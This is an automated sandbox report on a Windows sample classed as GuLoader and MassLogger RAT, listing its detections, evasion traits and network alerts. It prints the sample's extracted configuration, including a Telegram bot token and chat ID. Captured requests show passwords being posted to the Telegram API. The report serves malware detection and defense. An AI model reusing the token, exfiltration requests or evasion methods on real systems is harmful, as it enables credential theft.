Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
czHx16QwGQ.exe

Overview

General Information

Sample name:czHx16QwGQ.exe
renamed because original name is a hash value
Original sample name:84b2e764db4bcdad20e5b5455c35a59e9382d29c77ee3ce50940de23691a85a8.exe
Analysis ID:1588292
MD5:1a0fe25178e09cf0facc1f7bd6f221a8
SHA1:51e3ccc0373f62778f0d3ccc79f5f16136f77129
SHA256:84b2e764db4bcdad20e5b5455c35a59e9382d29c77ee3ce50940de23691a85a8
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • czHx16QwGQ.exe (PID: 1976 cmdline: "C:\Users\user\Desktop\czHx16QwGQ.exe" MD5: 1A0FE25178E09CF0FACC1F7BD6F221A8)
    • czHx16QwGQ.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\czHx16QwGQ.exe" MD5: 1A0FE25178E09CF0FACC1F7BD6F221A8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2176225336.00000000050E2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: czHx16QwGQ.exe PID: 5296JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:39:01.786657+010020577441Malware Command and Control Activity Detected192.168.2.849821149.154.167.220443TCP
            2025-01-10T23:39:03.820929+010020577441Malware Command and Control Activity Detected192.168.2.849837149.154.167.220443TCP
            2025-01-10T23:39:05.562695+010020577441Malware Command and Control Activity Detected192.168.2.849848149.154.167.220443TCP
            2025-01-10T23:39:07.214329+010020577441Malware Command and Control Activity Detected192.168.2.849858149.154.167.220443TCP
            2025-01-10T23:39:08.866445+010020577441Malware Command and Control Activity Detected192.168.2.849870149.154.167.220443TCP
            2025-01-10T23:39:10.471564+010020577441Malware Command and Control Activity Detected192.168.2.849882149.154.167.220443TCP
            2025-01-10T23:39:12.121448+010020577441Malware Command and Control Activity Detected192.168.2.849894149.154.167.220443TCP
            2025-01-10T23:39:13.759190+010020577441Malware Command and Control Activity Detected192.168.2.849909149.154.167.220443TCP
            2025-01-10T23:39:15.579856+010020577441Malware Command and Control Activity Detected192.168.2.849920149.154.167.220443TCP
            2025-01-10T23:39:17.124804+010020577441Malware Command and Control Activity Detected192.168.2.849933149.154.167.220443TCP
            2025-01-10T23:39:18.724664+010020577441Malware Command and Control Activity Detected192.168.2.849945149.154.167.220443TCP
            2025-01-10T23:39:20.369646+010020577441Malware Command and Control Activity Detected192.168.2.849959149.154.167.220443TCP
            2025-01-10T23:39:21.953870+010020577441Malware Command and Control Activity Detected192.168.2.849971149.154.167.220443TCP
            2025-01-10T23:39:23.463010+010020577441Malware Command and Control Activity Detected192.168.2.849983149.154.167.220443TCP
            2025-01-10T23:39:25.033820+010020577441Malware Command and Control Activity Detected192.168.2.849995149.154.167.220443TCP
            2025-01-10T23:39:26.604848+010020577441Malware Command and Control Activity Detected192.168.2.850007149.154.167.220443TCP
            2025-01-10T23:39:28.114488+010020577441Malware Command and Control Activity Detected192.168.2.850010149.154.167.220443TCP
            2025-01-10T23:39:29.654705+010020577441Malware Command and Control Activity Detected192.168.2.850012149.154.167.220443TCP
            2025-01-10T23:39:31.151584+010020577441Malware Command and Control Activity Detected192.168.2.850014149.154.167.220443TCP
            2025-01-10T23:39:32.720784+010020577441Malware Command and Control Activity Detected192.168.2.850016149.154.167.220443TCP
            2025-01-10T23:39:37.230195+010020577441Malware Command and Control Activity Detected192.168.2.850018149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:38:53.628248+010028032742Potentially Bad Traffic192.168.2.849770193.122.6.16880TCP
            2025-01-10T23:39:00.831434+010028032742Potentially Bad Traffic192.168.2.849770193.122.6.16880TCP
            2025-01-10T23:39:02.909553+010028032742Potentially Bad Traffic192.168.2.849831193.122.6.16880TCP
            2025-01-10T23:39:04.534573+010028032742Potentially Bad Traffic192.168.2.849843193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:38:48.199385+010028032702Potentially Bad Traffic192.168.2.849735216.58.206.46443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T23:39:01.479700+010018100081Potentially Bad Traffic192.168.2.849821149.154.167.220443TCP
            2025-01-10T23:39:03.511066+010018100081Potentially Bad Traffic192.168.2.849837149.154.167.220443TCP
            2025-01-10T23:39:05.091683+010018100081Potentially Bad Traffic192.168.2.849848149.154.167.220443TCP
            2025-01-10T23:39:06.875951+010018100081Potentially Bad Traffic192.168.2.849858149.154.167.220443TCP
            2025-01-10T23:39:08.463009+010018100081Potentially Bad Traffic192.168.2.849870149.154.167.220443TCP
            2025-01-10T23:39:10.124870+010018100081Potentially Bad Traffic192.168.2.849882149.154.167.220443TCP
            2025-01-10T23:39:11.748841+010018100081Potentially Bad Traffic192.168.2.849894149.154.167.220443TCP
            2025-01-10T23:39:13.393119+010018100081Potentially Bad Traffic192.168.2.849909149.154.167.220443TCP
            2025-01-10T23:39:15.071860+010018100081Potentially Bad Traffic192.168.2.849920149.154.167.220443TCP
            2025-01-10T23:39:16.886597+010018100081Potentially Bad Traffic192.168.2.849933149.154.167.220443TCP
            2025-01-10T23:39:18.401899+010018100081Potentially Bad Traffic192.168.2.849945149.154.167.220443TCP
            2025-01-10T23:39:20.015911+010018100081Potentially Bad Traffic192.168.2.849959149.154.167.220443TCP
            2025-01-10T23:39:21.647836+010018100081Potentially Bad Traffic192.168.2.849971149.154.167.220443TCP
            2025-01-10T23:39:23.224937+010018100081Potentially Bad Traffic192.168.2.849983149.154.167.220443TCP
            2025-01-10T23:39:24.739870+010018100081Potentially Bad Traffic192.168.2.849995149.154.167.220443TCP
            2025-01-10T23:39:26.301176+010018100081Potentially Bad Traffic192.168.2.850007149.154.167.220443TCP
            2025-01-10T23:39:27.882638+010018100081Potentially Bad Traffic192.168.2.850010149.154.167.220443TCP
            2025-01-10T23:39:29.424430+010018100081Potentially Bad Traffic192.168.2.850012149.154.167.220443TCP
            2025-01-10T23:39:30.938589+010018100081Potentially Bad Traffic192.168.2.850014149.154.167.220443TCP
            2025-01-10T23:39:32.440265+010018100081Potentially Bad Traffic192.168.2.850016149.154.167.220443TCP
            2025-01-10T23:39:36.938687+010018100081Potentially Bad Traffic192.168.2.850018149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: czHx16QwGQ.exeAvira: detected
            Source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: czHx16QwGQ.exe.5296.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: czHx16QwGQ.exeVirustotal: Detection: 74%Perma Link
            Source: czHx16QwGQ.exeReversingLabs: Detection: 63%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836D1EC CryptUnprotectData,5_2_3836D1EC
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_3836D9D9 CryptUnprotectData,5_2_3836D9D9
            Source: czHx16QwGQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49779 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49821 version: TLS 1.2
            Source: czHx16QwGQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38360671h5_2_383603AF
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38361042h5_2_38360C28
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836C985h5_2_3836C638
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836B339h5_2_3836B07F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836F2F8h5_2_3836F05A
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836BBE9h5_2_3836B930
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836C499h5_2_3836C1F2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836DD40h5_2_3836DA89
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836E5F0h5_2_3836E347
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836EEA0h5_2_3836EBF7
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38361042h5_2_38360C1B
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836B791h5_2_3836B4D8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836C041h5_2_3836BDA2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836E198h5_2_3836DEE1
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38361042h5_2_38360F6F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 3836EA48h5_2_3836E79F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then push 00000000h5_2_38F4BDF0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F4882Dh5_2_38F48650
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F491B7h5_2_38F48650
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F47318h5_2_38F47070
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F41B00h5_2_38F41858
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F44ACAh5_2_38F44820
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F42C60h5_2_38F429B8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F423B0h5_2_38F42108
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F45D60h5_2_38F45AB8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F43510h5_2_38F43268
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F454B0h5_2_38F45208
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F44670h5_2_38F443C8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F46610h5_2_38F46368
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_38F47B4F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F43DC0h5_2_38F43B18
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F47770h5_2_38F474C8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F41F58h5_2_38F41CB0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F46EC0h5_2_38F46C18
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F416A8h5_2_38F41400
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F45058h5_2_38F44DB0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F42808h5_2_38F42560
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F43968h5_2_38F436C0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F45908h5_2_38F45660
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F430B8h5_2_38F42E10
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F46A68h5_2_38F467C0
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F41250h5_2_38F40FA8
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F44218h5_2_38F43F70
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then jmp 38F461B8h5_2_38F45F10
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then push 00000000h5_2_3947E790
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then push 00000000h5_2_3947F2DE
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_3947F5A0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49821 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49821 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49848 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49848 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49882 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49882 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49837 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49837 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49858 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49858 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49894 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49894 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49959 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49945 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49945 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49920 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49959 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49920 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49971 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49971 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49933 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49933 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49909 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49909 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49870 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49870 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50012 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319daa71bf0dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b560e03860Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ca3ca070d5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e06c304c60Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f529a64ad4Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3209d84e4e33Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321e78449c5fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3233099429ecHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32478c38febdHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325eb93757f9Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3270658e9d73Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3284bc2d1cb5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3299042231bcHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ad3d6845d9Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32beb897ea19Host: api.telegram.orgContent-Length: 1090
